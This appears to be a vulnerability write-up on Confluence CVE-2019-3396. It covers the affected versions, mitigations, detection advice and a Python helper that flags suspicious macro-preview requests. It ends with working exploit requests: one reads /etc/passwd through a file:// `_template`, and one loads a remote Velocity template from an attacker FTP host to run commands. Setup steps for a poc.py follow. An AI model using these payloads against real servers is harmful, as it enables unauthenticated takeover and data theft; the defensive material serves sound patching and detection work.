CVE-2019-3396 confluence SSTI RCE
- A critical Confluence bug (Atlassian).
- Type: Template Injection + Path Traversal.
- Risk: Remote Code Execution (RCE) without login.
- Status: Exploited in the wild.
- 6.6.0 → 6.6.11 ❌ vulnerable
- 6.6.12 ✅ fixed
- 6.12.0 → 6.12.2 ❌ vulnerable
- 6.12.3 ✅ fixed
- 6.13.0 → 6.13.2 ❌ vulnerable
- 6.13.3 ✅ fixed
- 6.14.0 → 6.14.1 ❌ vulnerable
- 6.14.2 ✅ fixed
👉 Always check Atlassian’s official advisory for full details.
- Full server takeover
- Data theft, ransomware, crypto-miners
- Attackers can run any code they want
- ✅ Upgrade to patched Confluence version (best fix)
- 🚫 Disable Widget Connector macro if you can’t patch right away
- 🔒 Limit access (internal only until fixed)
- Watch web/access logs for requests to the macro preview endpoint (/rest/tinymce/1/macro/preview) whose `_template` parameter points at a file:// path or a remote URL
- Look for unexpected processes started by the Confluence service and for unusual outbound traffic (e.g. the server fetching templates from external FTP/HTTP hosts)
- Use a vulnerability scanner to confirm the running Confluence version against the affected ranges above
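As an added example (not part of the original page), a small Python helper covering two items on it: it checks a version string against the affected-branch table, and it flags requests to the macro preview endpoint whose `_template` points at a file:// or remote URL, the pattern of the requests shown on this page. Branches outside the table are reported as unknown rather than guessed.

```python
import json
import re

# Fix releases per affected branch, from the version table above: a version
# in a listed branch is vulnerable while it is below that release.
FIXED = {(6, 6): (6, 6, 12), (6, 12): (6, 12, 3),
         (6, 13): (6, 13, 3), (6, 14): (6, 14, 2)}

# Endpoint and parameter used by the requests shown on this page.
PREVIEW_PATH = "/rest/tinymce/1/macro/preview"
TEMPLATE_SCHEME = re.compile(r"^(file|ftp|https?)://", re.IGNORECASE)


def parse_version(text):
    """'6.13.1' -> (6, 13, 1)."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable(version):
    """True if the table marks `version` vulnerable, False if it is at or above
    the branch's fix release, None if the branch is not in the table at all
    (check the Atlassian advisory for those)."""
    parsed = parse_version(version)
    fixed = FIXED.get(parsed[:2])
    return None if fixed is None else parsed < fixed


def find_template(node):
    """Return the first `_template` value found anywhere in a parsed JSON body."""
    if isinstance(node, dict):
        if "_template" in node:
            return node["_template"]
        node = list(node.values())
    if isinstance(node, list):
        for child in node:
            hit = find_template(child)
            if hit is not None:
                return hit
    return None


def flag_request(path, body):
    """Reason string when a request to the preview endpoint carries a `_template`
    pointing at a file:// or remote URL (the exploit pattern), else None."""
    if not path.startswith(PREVIEW_PATH):
        return None
    try:
        template = find_template(json.loads(body))
    except ValueError:  # non-JSON body: not this exploit pattern
        return None
    if isinstance(template, str) and TEMPLATE_SCHEME.match(template):
        return "_template references external resource: " + template
    return None
```

Feed `flag_request` the path and body of each POST from your access or proxy logs; a non-None result is worth an alert regardless of the version check.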
Example request reading a local file through the `_template` parameter (path traversal):

```http
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}
```

Example request loading a remote Velocity template (cmd.vm) and running a command (RCE):

```http
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
```
Steps for poc.py:
- Upload cmd.vm to your VPS.
- Serve the cmd.vm file over FTP or HTTPS, e.g. with pyftpdlib:
  pip install pyftpdlib
  python -m pyftpdlib -p 8888
- Update poc.py with the new value: pyftp = "ftp://10.100.10.100:8888/cmd.vm"
- Run it as python poc.py <url> <cmd>, for example:
  python poc.py https://ip:port "id"